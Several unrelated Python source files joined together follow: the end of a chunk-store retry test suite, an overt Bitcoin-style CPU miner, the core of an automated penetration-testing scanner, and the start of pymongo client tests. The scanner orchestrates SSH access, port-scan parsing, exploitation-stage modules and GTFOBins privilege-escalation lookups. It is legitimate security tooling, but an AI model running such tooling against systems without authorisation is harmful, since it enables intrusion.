slices = (slice(3, 5),)
array_name = self.array_name(var_name)
chunk = getattr(self, var_name)[slices]
self.store.create_array(array_name)
self.store.put_chunk(array_name, slices, chunk)
return chunk, slices, self.store.join(array_name, suggestion)
@timed(0.9 + 0.2)
def test_recover_from_server_errors(self):
chunk, slices, array_name = self._put_chunk(
'please-respond-with-500-for-0.8-seconds')
# With the RETRY settings of 3 status retries, backoff factor of 0.1 s
# and SUGGESTED_STATUS_DELAY of 0.1 s we get the following timeline
# (indexed by seconds):
# 0.0 - access chunk for the first time
# 0.1 - response is 500, immediately try again (retry #1)
# 0.2 - response is 500, back off for 2 * 0.1 seconds
# 0.4 - retry #2
# 0.5 - response is 500, back off for 4 * 0.1 seconds
# 0.9 - retry #3 (the final attempt) - server should now be fixed
# 0.9 - success!
self.store.get_chunk(array_name, slices, chunk.dtype)
@timed(0.9 + 0.4)
def test_persistent_server_errors(self):
chunk, slices, array_name = self._put_chunk(
'please-respond-with-502-for-1.2-seconds')
# After 0.9 seconds the client gives up and returns with failure 0.1 s later
with assert_raises(ChunkNotFound):
self.store.get_chunk(array_name, slices, chunk.dtype)
@timed(0.6 + 0.2)
def test_recover_from_read_truncated_within_npy_header(self):
chunk, slices, array_name = self._put_chunk(
'please-truncate-read-after-60-bytes-for-0.4-seconds')
# With the RETRY settings of 3 status retries and backoff factor of 0.1 s
# we get the following timeline (indexed by seconds):
# 0.0 - access chunk for the first time
# 0.0 - response is 200 but truncated, immediately try again (retry #1)
# 0.0 - response is 200 but truncated, back off for 2 * 0.1 seconds
# 0.2 - retry #2, response is 200 but truncated, back off for 4 * 0.1 seconds
# 0.6 - retry #3 (the final attempt) - server should now be fixed
# 0.6 - success!
chunk_retrieved = self.store.get_chunk(array_name, slices, chunk.dtype)
assert_array_equal(chunk_retrieved, chunk, 'Truncated read not recovered')
@timed(0.6 + 0.2)
def test_recover_from_read_truncated_within_npy_array(self):
chunk, slices, array_name = self._put_chunk(
'please-truncate-read-after-129-bytes-for-0.4-seconds')
chunk_retrieved = self.store.get_chunk(array_name, slices, chunk.dtype)
assert_array_equal(chunk_retrieved, chunk, 'Truncated read not recovered')
@timed(0.6 + 0.4)
def test_persistent_truncated_reads(self):
chunk, slices, array_name = self._put_chunk(
'please-truncate-read-after-60-bytes-for-0.8-seconds')
# After 0.6 seconds the client gives up
with assert_raises(ChunkNotFound):
self.store.get_chunk(array_name, slices, chunk.dtype)
@timed(READ_PAUSE + 0.2)
def test_handle_read_paused_within_npy_header(self):
chunk, slices, array_name = self._put_chunk('please-pause-read-after-60-bytes')
chunk_retrieved = self.store.get_chunk(array_name, slices, chunk.dtype)
assert_array_equal(chunk_retrieved, chunk, 'Paused read failed')
@timed(READ_PAUSE + 0.2)
def test_handle_read_paused_within_npy_array(self):
chunk, slices, array_name = self._put_chunk('please-pause-read-after-129-bytes')
chunk_retrieved = self.store.get_chunk(array_name, slices, chunk.dtype)
assert_array_equal(chunk_retrieved, chunk, 'Paused read failed')
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The MTcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class MTcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
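# Illustrative example (added comment): bytereverse(0x12345678) == 0x78563412,
# i.e. the byte order within a single 32-bit word is flipped.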
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
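        # (added comment) the nonce occupies hex chars 152..160 of the 256-char
        # getwork 'data' string, i.e. bytes 76..80 of the 80-byte block header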
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = MTcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
core.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pympler import tracker
import configparser
from datetime import datetime
from core.gtfobins_scraper import get_gtfobin
import time
from core.redis_client import RedisClient
from database.models import RegressionTests, Runs
from core.ssh_session import Session
import logging
import sys
from core.constants import EX, EXTERNAL, IG, INTERNAL, VA, ModuleStages, RunStatus
import importlib
import json
import socket
from threading import Thread
from multiprocessing import Process
from core.helper import (
create_new_target,
get_module,
get_module_config,
get_module_types,
logger_class,
os_name,
python_version,
remove_suffix,
tool_config,
)
from database.db import check_db, db_con
import argparse
import os
import gc
from jumpssh.exception import ConnectionError
logger = logging.getLogger(__name__)
# Process specific variables
_session = None # Holds SSH Session object
_db_run = None # Run Row input for specific run
_redis = None
_latest_scan = None
timer_start = 0 # Timer for run
"""
Get scan id
"""
def get_scan_id():
global _db_run
return _db_run.id
"""
Initializes the program
"""
def load():
# Get args
# args = get_args()
# Read from command line
while True:
target = read_cli()
if target is not False:
# Create process
p = Process(
target=scanner_start,
args=(
target,
),
)
p.start()
"""
Function to get all modules for specific target with a certain type
Adds thread to threads array
"""
def thread_module_types(threads, config, type_, target_type):
global _session
logger.info(f"Running {target_type} {type_}")
# Append modules
for module in get_module_types(type_, target_type):
module = module.lower()
# Check if is in config file
if config.has_section(module.capitalize()):
module_config = config[module.capitalize()]
# Check if module should run
if module_config["enabled"] == "True":
# Check type, use Nmap result to run specific tools
cls = get_module(module)
# Run IG independantly from others
if type_ == IG:
threads.append(
Thread(
target=run_module,
args=(
cls(
get_module_config(config, module),
config["General"],
_session,
{},
),
),
)
)
else:
# Check if Nmap result exists, add to payload
if cls._target_type == EXTERNAL:
# Check which tools that can be executed, send payload with ports
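                        # Illustrative shape of nmap_result.json as consumed below
                        # (inferred from the keys accessed here, not a documented format):
                        #   {"nmaprun": {"host": {"ports": {"port": [
                        #       {"@portid": "22",
                        #        "state": {"@state": "open"},
                        #        "service": {"@name": "ssh"}}]}}}}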
try:
data = {}
with open(
f"{os.getcwd()}/targets/{config['General']['target']}/results/nmap_result.json",
"r"
) as f:
data = json.load(f)
payload = {"ports": []}
# Make into list
if type(data["nmaprun"]["host"]["ports"]["port"]) is dict:
data["nmaprun"]["host"]["ports"]["port"] = [data["nmaprun"]["host"]["ports"]["port"]]
# add all services
if "all" in cls._services:
for port in data["nmaprun"]["host"]["ports"]["port"]:
if port["state"]["@state"] == "open":
payload["ports"].append((port["@portid"], port["service"]["@name"]))
# add ports with specific services
else:
for port in data["nmaprun"]["host"]["ports"]["port"]:
if (
port["service"]["@name"] in cls._services
and port["state"]["@state"] == "open"
):
payload["ports"].append((port["@portid"], port["service"]["@name"]))
threads.append(
Thread(
target=run_module,
args=(
cls(
get_module_config(config, module),
config["General"],
_session,
payload,
),
),
)
)
except IOError:
logger.warn(
f"Portscanning result not present, skipping running module: {module.capitalize()}"
)
elif cls._target_type == INTERNAL:
try:
threads.append(
Thread(
target=run_module,
args=(
cls(
get_module_config(config, module),
config["General"],
_session,
{},
),
),
)
)
except IOError:
logger.warn(
f"Sysaudit result not present, skipping running module: {module.capitalize()}"
)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
del threads[:]
logger.info(f"Finished running {target_type} {type_}")
"""
Function to run all regression tests saved
"""
def regression_tests(threads, target):
global _latest_scan
db_session = db_con()
if _latest_scan is not None:
# Update db
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
"regression": RunStatus.RUNNING
})
db_session.commit()
# Get latest scan
latest_scan = db_session.query(Runs). \
filter(Runs.id == _latest_scan). \
join(RegressionTests). \
first()
db_session.expire_on_commit = False
# Go through all test cases
for test in latest_scan.regression_tests:
threads.append(
Thread(target=run_regtest, args=(test, target))
)
# Update db
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
"regression": RunStatus.FINISHED
})
db_session.commit()
"""
Main method for running the scanner for the target
"""
def scanner_start(target):
global _session, _db_run, timer_start, _redis, _latest_scan
# Config
tool_conf = tool_config()["General"]
# Get latest scan
db_session = db_con()
latest_scan = db_session.query(Runs). \
filter(Runs.target == target). \
order_by(Runs.id.desc()). \
first()
if latest_scan:
_latest_scan = latest_scan.id
# Create db entry for run
_db_run = Runs(target=target)
db_session.add(_db_run)
db_session.commit()
print(f"----- Starting scan on {target}, SCANID: {_db_run.id}------")
# Tracker
if tool_conf["log_level"] == "DEBUG":
tr = tracker.SummaryTracker()
tr.print_diff()
# Set logging file path
if tool_conf["log_level"] == "DEBUG":
level = logging.DEBUG
elif tool_conf["log_level"] == "INFO":
level = logging.INFO
elif tool_conf["log_level"] == "WARN":
level = logging.WARN
else:
level = logging.ERROR
logging.basicConfig(
filename=os.path.join(os.getcwd(), f"targets/{target}/run_{_db_run.id}.log"),
level=level,
format="%(asctime)s [%(levelname)s] %(message)s",
)
# Timer start
logger.info("Timer started for tool execution")
timer_start = int(round(time.time() * 1000))
# Connect to Redis
_redis = RedisClient(scan_id=_db_run.id)
# Read config file for target
config = configparser.ConfigParser()
config.read(os.path.join(f"{os.getcwd()}/targets", target) + "/config.ini")
# Get topology
topology = {}
with open(f"{os.getcwd()}/targets/{target}/topology.json") as f:
topology = json.load(f)
# Setup Jumpssh
_session = Session(topology, target)
try:
_session.connect_ssh()
except ConnectionError as e:
logger.error(e)
return False
# Create tmp directory
try:
logger.info(
f"Creating tempory directory at intermediate and target host: {tool_conf['rlocation']}"
)
_session.run_cmd(f"mkdir {tool_conf['rlocation']}")
_session.run_cmd_target(f"mkdir {tool_conf['rlocation']}")
except Exception as e:
logger.error(e)
# Array to hold threads
main_threads = []
    # Start the regression tests; external and internal stages run independently of each other
# Start only regression if set to true
if config["General"]["regression"] == "True":
regression_tests(main_threads, target)
main_threads.append(Thread(target=thread_independent_stages, args=(config, EXTERNAL,)))
# Skip internal if SSH connection not available at target
if _session.target_connected():
main_threads.append(Thread(target=thread_independent_stages, args=(config, INTERNAL,)))
else:
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
"internal_ig": RunStatus.FINISHED,
"internal_va": RunStatus.FINISHED,
"internal_ex": RunStatus.FINISHED
})
db_session.commit()
for thread in main_threads:
thread.start()
for thread in main_threads:
thread.join()
del main_threads[:]
# Remove temporary directory
try:
tool_conf = tool_config()["General"]
logger.info(
f"Removing tempory directory at intermediate and target host: {tool_conf['rlocation']}"
)
_session.run_cmd(f"rm -rf {tool_conf['rlocation']}")
_session.run_cmd_target(f"rm -rf {tool_conf['rlocation']}")
except Exception as e:
logger.error(e)
# Disconnect from all SSH
_session.disconnect()
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
"finished": datetime.utcnow()
})
db_session.commit()
# Disconnect from redis
_redis.close()
# Timer end
logger.info(
f"Timer ended for tool execution, took {int(round(time.time() * 1000)) - timer_start}ms to run"
)
# Collect garbage
gc.collect()
# Log memory summary
if tool_conf["log_level"] == "DEBUG":
tr.print_diff()
tr.print_diff()
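# (Added note, inferred from the code below): for a single target type this runs the
# IG, VA and EX module stages in sequence, setting the corresponding Runs columns to
# RUNNING before and FINISHED after each stage.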
def thread_independent_stages(config, type):
threads = []
db_session = db_con()
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
f"{type.lower()}_ig": RunStatus.RUNNING
})
db_session.commit()
thread_module_types(threads, config, IG, type)
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
f"{type.lower()}_ig": RunStatus.FINISHED,
f"{type.lower()}_va": RunStatus.RUNNING
})
db_session.commit()
thread_module_types(threads, config, VA, type)
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
f"{type.lower()}_va": RunStatus.FINISHED,
f"{type.lower()}_ex": RunStatus.RUNNING
})
db_session.commit()
thread_module_types(threads, config, EX, type)
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
f"{type.lower()}_ex": RunStatus.FINISHED
})
db_session.commit()
"""
Runs a specific module
"""
def run_module(module):
global _redis
module_name = remove_suffix(module.__class__.__name__, "Module")
_redis.module_publish(module_name, ModuleStages.REMOVING, RunStatus.RUNNING)
    # Remove old module result
logger_class(module, "Removing old module result", "debug")
module.remove_old_result()
logger_class(module, "Finished removing old module", "debug")
_redis.module_publish(module_name, ModuleStages.REMOVING, RunStatus.FINISHED)
# Init module
_redis.module_publish(module_name, ModuleStages.INIT, RunStatus.RUNNING)
logger_class(module, "Initializing module", "debug")
module.init()
logger_class(module, "Finished initializing module", "debug")
_redis.module_publish(module_name, ModuleStages.INIT, RunStatus.FINISHED)
# Run module
_redis.module_publish(module_name, ModuleStages.RUN, RunStatus.RUNNING)
logger_class(module, "Running module", "debug")
module.run()
logger_class(module, "Finished running module", "debug")
_redis.module_publish(module_name, ModuleStages.RUN, RunStatus.FINISHED)
# Handle result
_redis.module_publish(module_name, ModuleStages.GET, RunStatus.RUNNING)
logger_class(module, "Getting result", "debug")
module.get_result()
logger_class(module, "Finished getting result", "debug")
_redis.module_publish(module_name, ModuleStages.GET, RunStatus.FINISHED)
# Parse module result
_redis.module_publish(module_name, ModuleStages.PARSE, RunStatus.RUNNING)
logger_class(module, "Parsing result", "debug")
module.parse()
logger_class(module, "Finished parsing result", "debug")
_redis.module_publish(module_name, ModuleStages.PARSE, RunStatus.FINISHED)
# Check regression
_redis.module_publish(module_name, ModuleStages.REGTEST, RunStatus.RUNNING)
logger_class(module, "Checking module regtests", "debug")
module.check_regtests()
logger_class(module, "Finished checking module regtests", "debug")
_redis.module_publish(module_name, ModuleStages.REGTEST, RunStatus.FINISHED)
"""
Creates and runs a regtest
"""
def run_regtest(test_entry, target):
global _session
db_session = db_con()
test_entry = db_session.query(test_entry)
module_name = test_entry.module
logger.debug(f"Running regression test {module_name.capitalize()}")
# Get target type from module
cls_module = getattr(
importlib.import_module(f"modules.{module_name.lower()}"),
f"{module_name.capitalize()}Module",
)
target_type = cls_module._target_type
# Create regtest module
cls = getattr(
importlib.import_module(f"modules.{module_name.lower()}"),
f"{test_entry.name}Regression",
)
# Create regression test object
reg_obj = cls(_session, test_entry.payload, test_entry.config, target_type, target)
# Remove old result
reg_obj.remove_old_result()
# Run regtest
reg_obj.run()
# Get result
reg_obj.get_result()
# Parse result
reg_obj.parse()
logger.debug(f"Finished running regression test {module_name.capitalize()}")
"""
Get CLI arguments
"""
def get_args():
parser = argparse.ArgumentParser("python main.py")
# parser.add_argument('-u', '--user', help="Root username", required=True)
# parser.add_argument('-p', '--password', help="Root password", required=True)
return parser.parse_args()
"""
Specify which target to run against
"""
def read_cli():
target = input("Choose target: ")
# Don't allow empty inputs
if not target:
return False
try:
        # Check if valid IP address
socket.inet_aton(target)
# Check if target exists
if os.path.isdir(os.path.join(f"{os.getcwd()}/targets", target)):
print(f"Starting scan for target: {target}")
return target
else:
# Create new target
print(f"{target} does not exists, creating new folder")
create_new_target(target)
print(f"Folder for {target} created, please configure it before retrying")
return False
except Exception:
return False
"""
Checks that all dependencies are present
"""
def check_dependencies():
# Check platform essentials
if python_version() == 2:
sys.exit("Python2 is not supported. Run the tool with Python3!")
if "linux" not in os_name():
sys.exit("The tool can only be run on Linux Distributions!")
# Check if modules are installed on tool host
# Also check if modules are installed on target machine
# Check if DB is up & migrate new table changes
check_db()
# Update GTFOBIN
if tool_config()["General"]["gtfobin_update"] == "True":
print("Updating GTFOBIN")
get_gtfobin()
print("Finished updating GTFOBIN")
|
test_client.py
|
# Copyright 2013-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the mongo_client module."""
import contextlib
import datetime
import os
import socket
import struct
import sys
import time
import traceback
import warnings
sys.path[0:0] = [""]
from bson import BSON
from bson.codec_options import CodecOptions
from bson.py3compat import thread, u
from bson.son import SON
from bson.tz_util import utc
from pymongo import auth, message
from pymongo.cursor import CursorType
from pymongo.database import Database
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidName,
OperationFailure,
CursorNotFound,
NetworkTimeout,
InvalidURI)
from pymongo.message import _CursorAddress
from pymongo.mongo_client import MongoClient
from pymongo.pool import SocketInfo
from pymongo.read_preferences import ReadPreference
from pymongo.server_selectors import (any_server_selector,
writable_server_selector)
from pymongo.server_type import SERVER_TYPE
from pymongo.write_concern import WriteConcern
from test import (client_context,
client_knobs,
host,
pair,
port,
SkipTest,
unittest,
IntegrationTest,
db_pwd,
db_user,
MockClientTest)
from test.pymongo_mocks import MockClient
from test.utils import (assertRaisesExactly,
delay,
remove_all_users,
server_is_master_with_slave,
get_pool,
one,
connected,
wait_until,
rs_or_single_client,
rs_or_single_client_noauth,
lazy_client_trial,
NTHREADS)
class ClientUnitTest(unittest.TestCase):
"""MongoClient tests that don't require a server."""
@classmethod
def setUpClass(cls):
cls.client = MongoClient(host, port, connect=False,
serverSelectionTimeoutMS=100)
def test_keyword_arg_defaults(self):
client = MongoClient(socketTimeoutMS=None,
connectTimeoutMS=20000,
waitQueueTimeoutMS=None,
waitQueueMultiple=None,
socketKeepAlive=False,
replicaSet=None,
read_preference=ReadPreference.PRIMARY,
ssl=False,
ssl_keyfile=None,
ssl_certfile=None,
ssl_cert_reqs=0, # ssl.CERT_NONE
ssl_ca_certs=None,
connect=False,
serverSelectionTimeoutMS=12000)
options = client._MongoClient__options
pool_opts = options.pool_options
self.assertEqual(None, pool_opts.socket_timeout)
# socket.Socket.settimeout takes a float in seconds
self.assertEqual(20.0, pool_opts.connect_timeout)
self.assertEqual(None, pool_opts.wait_queue_timeout)
self.assertEqual(None, pool_opts.wait_queue_multiple)
self.assertFalse(pool_opts.socket_keepalive)
self.assertEqual(None, pool_opts.ssl_context)
self.assertEqual(None, options.replica_set_name)
self.assertEqual(ReadPreference.PRIMARY, client.read_preference)
self.assertAlmostEqual(12, client.server_selection_timeout)
def test_types(self):
self.assertRaises(TypeError, MongoClient, 1)
self.assertRaises(TypeError, MongoClient, 1.14)
self.assertRaises(TypeError, MongoClient, "localhost", "27017")
self.assertRaises(TypeError, MongoClient, "localhost", 1.14)
self.assertRaises(TypeError, MongoClient, "localhost", [])
self.assertRaises(ConfigurationError, MongoClient, [])
def test_max_pool_size_zero(self):
with self.assertRaises(ValueError):
MongoClient(maxPoolSize=0)
def test_get_db(self):
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, self.client, "")
self.assertRaises(InvalidName, make_db, self.client, "te$t")
self.assertRaises(InvalidName, make_db, self.client, "te.t")
self.assertRaises(InvalidName, make_db, self.client, "te\\t")
self.assertRaises(InvalidName, make_db, self.client, "te/t")
self.assertRaises(InvalidName, make_db, self.client, "te st")
self.assertTrue(isinstance(self.client.test, Database))
self.assertEqual(self.client.test, self.client["test"])
self.assertEqual(self.client.test, Database(self.client, "test"))
def test_get_database(self):
codec_options = CodecOptions(tz_aware=True)
write_concern = WriteConcern(w=2, j=True)
db = self.client.get_database(
'foo', codec_options, ReadPreference.SECONDARY, write_concern)
self.assertEqual('foo', db.name)
self.assertEqual(codec_options, db.codec_options)
self.assertEqual(ReadPreference.SECONDARY, db.read_preference)
self.assertEqual(write_concern, db.write_concern)
def test_getattr(self):
self.assertTrue(isinstance(self.client['_does_not_exist'], Database))
with self.assertRaises(AttributeError) as context:
self.client._does_not_exist
# Message should be:
# "AttributeError: MongoClient has no attribute '_does_not_exist'. To
# access the _does_not_exist database, use client['_does_not_exist']".
self.assertIn("has no attribute '_does_not_exist'",
str(context.exception))
def test_iteration(self):
def iterate():
[a for a in self.client]
self.assertRaises(TypeError, iterate)
def test_get_default_database(self):
c = MongoClient("mongodb://%s:%d/foo" % (host, port), connect=False)
self.assertEqual(Database(c, 'foo'), c.get_default_database())
def test_get_default_database_error(self):
# URI with no database.
c = MongoClient("mongodb://%s:%d/" % (host, port), connect=False)
self.assertRaises(ConfigurationError, c.get_default_database)
def test_get_default_database_with_authsource(self):
# Ensure we distinguish database name from authSource.
uri = "mongodb://%s:%d/foo?authSource=src" % (host, port)
c = MongoClient(uri, connect=False)
self.assertEqual(Database(c, 'foo'), c.get_default_database())
class TestClient(IntegrationTest):
def test_max_idle_time_reaper(self):
with client_knobs(kill_cursor_frequency=0.1):
# Assert reaper doesn't remove sockets when maxIdleTimeMS not set
client = MongoClient(host, port)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}) as sock_info:
pass
time.sleep(1)
self.assertEqual(1, len(server._pool.sockets))
self.assertTrue(sock_info in server._pool.sockets)
# Assert reaper removes idle socket and replaces it with a new one
client = MongoClient(host, port, maxIdleTimeMS=.5, minPoolSize=1)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}) as sock_info:
pass
time.sleep(2)
self.assertEqual(1, len(server._pool.sockets))
self.assertFalse(sock_info in server._pool.sockets)
# Assert reaper has removed idle socket and NOT replaced it
client = MongoClient(host, port, maxIdleTimeMS=.5)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}):
pass
time.sleep(1)
self.assertEqual(0, len(server._pool.sockets))
def test_min_pool_size(self):
with client_knobs(kill_cursor_frequency=.1):
client = MongoClient(host, port)
server = client._get_topology().select_server(any_server_selector)
time.sleep(1)
self.assertEqual(0, len(server._pool.sockets))
# Assert that pool started up at minPoolSize
client = MongoClient(host, port, minPoolSize=10)
server = client._get_topology().select_server(any_server_selector)
time.sleep(1)
self.assertEqual(10, len(server._pool.sockets))
# Assert that if a socket is closed, a new one takes its place
with server._pool.get_socket({}) as sock_info:
sock_info.close()
time.sleep(1)
self.assertEqual(10, len(server._pool.sockets))
self.assertFalse(sock_info in server._pool.sockets)
def test_max_idle_time_checkout(self):
with client_knobs(kill_cursor_frequency=99999999):
client = MongoClient(host, port, maxIdleTimeMS=.5)
time.sleep(1)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}) as sock_info:
pass
time.sleep(1)
with server._pool.get_socket({}) as new_sock_info:
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(1, len(server._pool.sockets))
self.assertFalse(sock_info in server._pool.sockets)
self.assertTrue(new_sock_info in server._pool.sockets)
client = MongoClient(host, port)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}) as sock_info:
pass
time.sleep(1)
with server._pool.get_socket({}) as new_sock_info:
self.assertEqual(sock_info, new_sock_info)
self.assertEqual(1, len(server._pool.sockets))
def test_constants(self):
# Set bad defaults.
MongoClient.HOST = "somedomainthatdoesntexist.org"
MongoClient.PORT = 123456789
with self.assertRaises(AutoReconnect):
connected(MongoClient(serverSelectionTimeoutMS=10))
# Override the defaults. No error.
connected(MongoClient(host, port))
# Set good defaults.
MongoClient.HOST = host
MongoClient.PORT = port
# No error.
connected(MongoClient())
def test_init_disconnected(self):
c = rs_or_single_client(connect=False)
# is_primary causes client to block until connected
self.assertIsInstance(c.is_primary, bool)
c = rs_or_single_client(connect=False)
self.assertIsInstance(c.is_mongos, bool)
c = rs_or_single_client(connect=False)
self.assertIsInstance(c.max_pool_size, int)
self.assertIsInstance(c.nodes, frozenset)
c = rs_or_single_client(connect=False)
self.assertEqual(c.codec_options, CodecOptions())
self.assertIsInstance(c.max_bson_size, int)
c = rs_or_single_client(connect=False)
self.assertFalse(c.primary)
self.assertFalse(c.secondaries)
c = rs_or_single_client(connect=False)
self.assertIsInstance(c.max_write_batch_size, int)
if client_context.is_rs:
# The primary's host and port are from the replica set config.
self.assertIsNotNone(c.address)
else:
self.assertEqual(c.address, (host, port))
bad_host = "somedomainthatdoesntexist.org"
c = MongoClient(bad_host, port, connectTimeoutMS=1,
serverSelectionTimeoutMS=10)
self.assertRaises(ConnectionFailure, c.pymongo_test.test.find_one)
def test_init_disconnected_with_auth(self):
uri = "mongodb://user:pass@somedomainthatdoesntexist"
c = MongoClient(uri, connectTimeoutMS=1,
serverSelectionTimeoutMS=10)
self.assertRaises(ConnectionFailure, c.pymongo_test.test.find_one)
def test_equality(self):
c = connected(rs_or_single_client())
self.assertEqual(client_context.rs_or_standalone_client, c)
# Explicitly test inequality
self.assertFalse(client_context.rs_or_standalone_client != c)
def test_host_w_port(self):
with self.assertRaises(ValueError):
connected(MongoClient("%s:1234567" % host, connectTimeoutMS=1,
serverSelectionTimeoutMS=10))
def test_repr(self):
# Used to test 'eval' below.
import bson
client = MongoClient(
'mongodb://localhost:27017,localhost:27018/?replicaSet=replset'
'&connectTimeoutMS=12345&w=1&wtimeoutms=100',
connect=False, document_class=SON)
the_repr = repr(client)
self.assertIn('MongoClient(host=', the_repr)
self.assertIn(
"document_class=bson.son.SON, "
"tz_aware=False, "
"connect=False, ",
the_repr)
self.assertIn("connecttimeoutms=12345", the_repr)
